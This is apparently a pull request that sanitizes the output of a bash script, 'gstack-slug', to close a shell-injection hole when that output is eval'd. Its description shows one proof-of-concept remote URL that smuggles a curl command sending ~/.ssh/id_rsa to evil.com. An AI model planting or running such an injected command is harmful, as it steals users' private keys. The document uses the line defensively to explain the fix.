### PR TITLE
fix(security): sanitize gstack-slug output against shell injection

### DIFF
--- a/bin/gstack-slug
+++ b/bin/gstack-slug
@@ -1,9 +1,15 @@
 #!/usr/bin/env bash
 # gstack-slug — output project slug and sanitized branch name
-# Usage: source <(gstack-slug)  → sets SLUG and BRANCH variables
-# Or:    gstack-slug           → prints SLUG=... and BRANCH=... lines
+# Usage: eval $(gstack-slug)  → sets SLUG and BRANCH variables
+# Or:    gstack-slug          → prints SLUG=... and BRANCH=... lines
+#
+# Security: output is sanitized to [a-zA-Z0-9._-] only, preventing
+# shell injection when consumed via eval $(gstack-slug).
 set -euo pipefail
-SLUG=$(git remote get-url origin 2>/dev/null | sed 's|.*[:/]\([^/]*/[^/]*\)\.git$|\1|;s|.*[:/]\([^/]*/[^/]*\)$|\1|' | tr '/' '-')
-BRANCH=$(git rev-parse --abbrev-ref HEAD 2>/dev/null | tr '/' '-')
+RAW_SLUG=$(git remote get-url origin 2>/dev/null | sed 's|.*[:/]\([^/]*/[^/]*\)\.git$|\1|;s|.*[:/]\([^/]*/[^/]*\)$|\1|' | tr '/' '-')
+RAW_BRANCH=$(git rev-parse --abbrev-ref HEAD 2>/dev/null | tr '/' '-')
+# Strip any characters that aren't alphanumeric, dot, hyphen, or underscore
+SLUG=$(printf '%s' "$RAW_SLUG" | tr -cd 'a-zA-Z0-9._-')
+BRANCH=$(printf '%s' "$RAW_BRANCH" | tr -cd 'a-zA-Z0-9._-')
 echo "SLUG=$SLUG"
 echo "BRANCH=$BRANCH"


### PR DESCRIPTION
## The bug

`gstack-slug` output is consumed via `eval $(gstack-slug)` in every skill template. If a git remote URL contains shell metacharacters, they execute:

```bash
# Malicious remote URL:
git remote set-url origin 'git@github.com:user/repo$(curl evil.com/steal?token=$(cat ~/.ssh/id_rsa)).git'

# Current behavior — eval executes the payload:
eval $(gstack-slug)
# → runs: curl evil.com/steal?token=...

# After this fix — payload is sanitized:
eval $(gstack-slug)
# → SLUG=userrepocurlevil.comstealtokencat.sshid_rsa
```

## The fix

Strip all characters except `[a-zA-Z0-9._-]` from SLUG and BRANCH before output:

```bash
SLUG=$(printf '%s' "$RAW_SLUG" | tr -cd 'a-zA-Z0-9._-')
BRANCH=$(printf '%s' "$RAW_BRANCH" | tr -cd 'a-zA-Z0-9._-')
```

Normal values are unaffected. Injection payloads become harmless strings.

## 1 file changed, 6 lines

Only `bin/gstack-slug` modified. No other files touched.

## Test plan
- [x] Normal remote URLs produce correct SLUG/BRANCH
- [x] `$(command)` injection stripped → becomes literal characters
- [x] Backtick injection stripped
- [x] Semicolon injection stripped
- [x] All 406 existing tests pass